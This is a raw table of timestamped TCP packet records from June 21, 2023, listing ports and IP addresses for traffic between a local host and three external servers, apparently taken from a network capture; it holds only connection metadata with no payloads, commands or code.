Jun 21, 2023 04:27:46.974962950 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.974970102 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.974993944 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.975006104 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.975022078 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.975354910 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.975383997 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.975408077 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.975436926 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.975438118 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.975464106 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.975492954 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.975502968 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.975522995 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.975523949 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.975548983 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.975572109 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.975594997 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.975620031 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.975629091 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.975649118 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.975676060 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.975680113 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.975701094 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.975725889 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.975749016 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.975775957 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.975780010 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.975805044 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.975831985 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.975833893 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.975855112 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.975872993 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.980144978 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:47.483896017 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:47.483983040 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:47.501009941 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:47.501063108 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:47.556054115 CEST	49710	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:47.556118965 CEST	443	49710	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:47.556260109 CEST	49710	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:47.563641071 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:47.563688040 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:47.564095020 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:47.593832016 CEST	49710	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:47.593897104 CEST	443	49710	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:47.666115046 CEST	49711	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:47.666189909 CEST	443	49711	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:47.666296005 CEST	49711	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:47.673446894 CEST	443	49710	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:47.673549891 CEST	49710	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:47.674922943 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:47.675000906 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:47.685096025 CEST	49710	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:47.685120106 CEST	443	49710	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:47.685812950 CEST	443	49710	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:47.686062098 CEST	49710	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:47.687855959 CEST	49710	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:47.691829920 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:47.691864014 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:47.698003054 CEST	49711	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:47.698065996 CEST	443	49711	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:47.728316069 CEST	443	49710	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:47.740221977 CEST	443	49710	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:47.740394115 CEST	443	49710	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:47.741101980 CEST	49710	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:47.750657082 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:47.750679970 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:47.760040045 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:47.778687954 CEST	443	49711	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:47.778826952 CEST	49711	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:47.806760073 CEST	49710	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:47.806807995 CEST	443	49710	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:47.810924053 CEST	49711	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:47.810986996 CEST	443	49711	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:47.811721087 CEST	443	49711	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:47.811834097 CEST	49711	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:47.876147032 CEST	49711	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:47.916287899 CEST	443	49711	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:47.916418076 CEST	443	49711	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:47.916526079 CEST	49711	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:47.920360088 CEST	49711	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:47.920398951 CEST	443	49711	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:48.164530039 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:48.412132025 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:48.412297964 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:48.412858009 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:48.582906961 CEST	49713	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:48.582954884 CEST	443	49713	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:48.583045006 CEST	49713	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:48.622185946 CEST	49713	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:48.622250080 CEST	443	49713	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:48.701237917 CEST	443	49713	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:48.701492071 CEST	49713	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:48.703217030 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:48.771430016 CEST	49713	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:48.771506071 CEST	443	49713	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:48.772330999 CEST	443	49713	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:48.776350021 CEST	49713	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:48.807724953 CEST	49713	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:48.848303080 CEST	443	49713	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:48.848361015 CEST	443	49713	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:48.848500013 CEST	443	49713	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:48.848501921 CEST	49713	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:48.848568916 CEST	49713	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:48.867043018 CEST	49713	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:48.867116928 CEST	443	49713	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:48.953468084 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.147165060 CEST	49715	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:49.147269011 CEST	443	49715	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:49.147526026 CEST	49715	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:49.167901993 CEST	49715	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:49.167943954 CEST	443	49715	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:49.193006039 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.193217039 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.196811914 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.200758934 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.200814962 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.200858116 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.200907946 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.200952053 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.201014042 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.201076031 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.201121092 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.201175928 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.201179981 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.201175928 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.201175928 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.201226950 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.201395035 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.208368063 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.248697042 CEST	443	49715	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:49.252254963 CEST	49715	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:49.307040930 CEST	49715	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:49.307109118 CEST	443	49715	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:49.307828903 CEST	443	49715	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:49.307954073 CEST	49715	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:49.310184956 CEST	49715	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:49.349761963 CEST	443	49715	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:49.349890947 CEST	443	49715	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:49.356002092 CEST	49715	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:49.448447943 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.448517084 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.448563099 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.448607922 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.448652983 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.448714972 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.448782921 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.448828936 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.448851109 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.448851109 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.448851109 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.448899031 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.448956966 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.448999882 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.449047089 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.449091911 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.449099064 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.449099064 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.449140072 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.449141979 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.449187040 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.449232101 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.449278116 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.449287891 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.449320078 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.449325085 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.452347040 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.456135988 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.456187010 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.464329004 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.483064890 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.577225924 CEST	49715	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:49.577255011 CEST	443	49715	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:49.705486059 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.705598116 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.705641031 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.705679893 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.705720901 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.705837011 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.705874920 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.705904961 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.705905914 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.705905914 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.705913067 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.705967903 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.706008911 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.706008911 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.706113100 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.706151962 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.706191063 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.706242085 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.706250906 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.706250906 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.706379890 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.706420898 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.706456900 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.706491947 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.706495047 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.706496000 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.706574917 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.706631899 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.706690073 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.706729889 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.706772089 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.706805944 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.706805944 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.706805944 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.706818104 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.706918001 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.706957102 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.706955910 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.706996918 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.707052946 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.707098961 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.707179070 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.707220078 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.707262039 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.707304001 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.707314014 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.707314014 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.709834099 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.714299917 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.714875937 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.714924097 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.714975119 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.715137005 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.715137005 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.755283117 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.755331039 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.755429983 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.755485058 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.755500078 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.755902052 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.925338984 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.925394058 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.925420046 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.925448895 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.925487041 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.925501108 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.925518036 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.925546885 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.925554991 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.925575972 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.925580025 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.925609112 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.925637007 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.925645113 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.928253889 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.955252886 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.955293894 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.955316067 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.955338001 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.955363989 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.955385923 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.955427885 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.955445051 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.955456018 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.955470085 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.955490112 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.955574989 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.955574989 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.955574989 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.955641031 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.955741882 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.955770016 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.955813885 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.955841064 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.955864906 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.955890894 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.955915928 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.955914974 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.955914974 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.955936909 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.955964088 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.955988884 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.956015110 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.956039906 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.956054926 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.956054926 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.956058979 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.956084013 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.956109047 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.956109047 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.956110954 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.956136942 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.956163883 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.956180096 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.956192017 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.956218004 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.956248045 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.956288099 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.956296921 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.956296921 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.956315041 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.956338882 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.956362009 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.956376076 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.956384897 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.956408978 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.956409931 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.956430912 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.956456900 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.956480980 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.956495047 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.956495047 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.956506968 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.956531048 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.956623077 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.957401037 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.957956076 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.957988024 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.958089113 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.962270975 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.962306976 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.962333918 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.962389946 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:49.962476015 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:49.962476015 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.005364895 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.005398989 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.005422115 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.005445957 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.005533934 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.107364893 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.165216923 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.165256023 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.165294886 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.165321112 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.165334940 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.165334940 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.165347099 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.165374041 CEST	80	49714	123.140.161.243	192.168.2.3
